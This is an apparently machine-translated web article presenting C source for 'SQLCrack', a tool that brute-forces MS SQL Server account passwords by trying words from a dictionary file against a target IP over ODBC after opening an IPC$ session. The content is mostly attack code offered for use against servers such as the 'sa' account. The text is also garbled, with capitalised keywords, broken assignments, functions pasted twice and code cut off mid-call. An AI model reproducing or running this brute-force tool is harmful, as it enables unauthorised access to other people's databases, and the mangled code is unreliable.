How to crack the password of MS SQL SERVER

This article focuses on how to detect the password of the ms SQL SERVER account. The following example describes the entire process of password detection.

// Header file used by the program
// Define global variables

Char dict [20000] [40], // The password to be tested
UserName [40], // User Name
Target [40], // target server
Passwd [40]; // the correct password that has been detected
Int total = 0; // number of words in the dictionary
BOOL Cracked = FALSE; // This value is TRUE when the password is successfully tested.
//
// Function: usage
// Function: displays program help information.
//
Void usage ()
{
Printf ("\ nPower by analyzer <〈
[Email] inmiao@163.com [/email]
> 〉"
"\ Nhttp: // www.infocn.com"
"\ NUsage: SQLCrack <ip> <UserName> <dict> <SleepTime [20-1000]>"
"\ NExample: SQLCrack 192.168.0.1 sa c: \ pwd. dic 50 \ n"); return;
}
//
// Function: ReadDic
// Function: read data from the dictionary file, pass it to the global variable dict, and prepare the Test password.
// Description: If the function fails to run, return 1. If the function succeeds, return 0.
//
Int ReadDic (char * dic)
{
FILE * fp;
Char tmp [40];
// Open the dictionary file
If (fp = fopen (dic, "r") = NULL)
{
Printf ("\ nCaN' t open % s ", dic );
Return 1;
}
While (! Feof (fp ))
{
// Read data to temporary variables
If (fgets (tmp, 40, fp) = NULL)
Break;
// Do not forget to remove the last data read from the file from the [line feed symbol]. Otherwise, the password will not be detected.
Strncpy (dict [total], tmp, strlen (tmp)-1 );
Total ++;
// Because dict is defined as dict [20000] [40], if the number of words in the dictionary exceeds 20000, the loop is exited.
// Otherwise it will overflow. you can adjust it on your own
If (total> = 20000)
Break;
}
Fclose (fp );
Return 0;
}
//
// Function: ConnIPC
// Function: Establish an IPC connection
// Description: return value 1 for connection failure and return value 0 for success
//
Int ConnIPC (char * RemoteName)
{
NETRESOURCE nr;
DWORD flags = CONNECT_UPDATE _PROFILE;
Tchar rn [30] = "",
LN [5] = "";
Strcat (RN, RemoteName );
Strcat (RN, "\ ipc $ ");
// Fill in the Data Structure
Nr. dwType = RESOURCETYPE_DISK;
Nr. lpLocalName = (LPTSTR) & LN;
Nr. lpRemoteName = (LPTSTR) & RN;
Nr. lpProvider = NULL;
If (WNetAddConnection2 (& nr, (LPSTR) "", (LPSTR) "", flags) = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function: DelIPC
// Function: disconnect the IPC Session
// Description: the return value is 0. Otherwise, 1 is returned.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $ ");
Ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE, TRUE );
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
DWORD WINAPI SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value SCHAR ConnStr [200]; // connectionDatabaseString
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS)
{
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr), szBuffer, sizeof
(SzBuffer), & swStrLen,
SQL _DRIVER_COMPLETE_REQUIRED );
// Printf ("conn ..");
If (retcode! = SQL _SUCCESS & retcode! = SQL _SUCCESS_WITH_INFO)
{
// Connection failed and function terminated
// Printf ("\ nCouldn't connect to % s MSSQL server. \ n", target );
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// The remote MSSQL Server database is successfully connected.
Cracked = TRUE;
Strcpy (passwd, pwd );
// Puts (szBuffer );
// Display the string connecting to the remote database
// Disconnect
SQLDisconnect (hdbc );
// Printf ("disconn ..");
// Release the connection handle
SQLFreeHandle (SQL _HANDLE_DBC, hdbc );
// Printf ("free hdbc ..");
// Release the environment handle
SQLFreeHandle (SQL _HANDLE_ENV, henv );
// Printf ("free henv .. \ n ");
Return 0;
}
//
// Function: DelIPC
// Function: disconnect the IPC Session
// Description: the return value is 0. Otherwise, 1 is returned.
//
Int DelIPC (char * RemoteName)
{
DWORD ret;
TCHAR lpName [30] = "";
Strcat (lpName, RemoteName );
Strcat (lpName, "\ ipc $"); ret = WNetCancelConnection2 (lpName, CONNECT_UPDATE_PROFILE,
TRUE );
If (ret = NO_ERROR)
{
Return 0;
}
Else
{
Return 1;
}
}
//
// Function SQLCheck
// Function: Try to connect to SQL Server with different passwords to detect the correct password
//
Dword winapi SQLCheck (PVOID pPwd)
{
// Define local variables
Char szBuffer [1025];
Char * pwd;
SWORD swStrLen;
SQLHDBC hdbc;
SQLHANDLE henv;
SQLRETURN retcode; // odbc api running return value
SCHAR ConnStr [200]; // connection string
// Obtain the password passed for testing
Pwd = (char *) pPwd;
// Construct database connection characters
Strcpy (ConnStr, "DRIVER = {SQL Server}; SERVER = ");
Strcat (ConnStr, target );
Strcat (ConnStr, "; UID = ");
Strcat (ConnStr, UserName );
Strcat (ConnStr, "; PWD = ");
Strcat (ConnStr, pwd );
Strcat (ConnStr, "; DATABASE = master ");
// Puts (ConnStr );
// Create an environment handle for the database application
If (SQLAllocHandle (SQL _HANDLE_ENV, SQL _NULL_HANDLE, & henv )! = SQL _SUCCESS ){
Printf ("\ nAllocate environment handle failed. \ n ");
Return 0;
}
// Printf ("henv ..");
// Set the ODBC version environment
If (SQLSetEnvAttr (henv, SQL _ATTR_ODBC_VERSION, (SQLPOINTER)
SQL _OV_ODBC3, SQL _IS_INTEGER )! = SQL _SUCCESS)
{
Printf ("\ nSet the ODBC version environment attribute failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("ODBC ver ..");
// Create a connection handle
If (retcode = SQLAllocHandle (SQL _HANDLE_DBC, henv, (SQLHDBC FAR
*) & Hdbc ))! = SQL _SUCCESS)
{
Printf ("\ nAllocate connection handle failed. \ n ");
SQLFreeHandle (SQL _HANDLE_ENV, henv );
Return 0;
}
// Printf ("hdbc ..");
// Connect to the data source
Retcode = SQLDriverConnect (hdbc, NULL, ConnStr, strlen (ConnStr ),
SzBuffer, sizeof (szBuffer ),&

Source: jieshiwang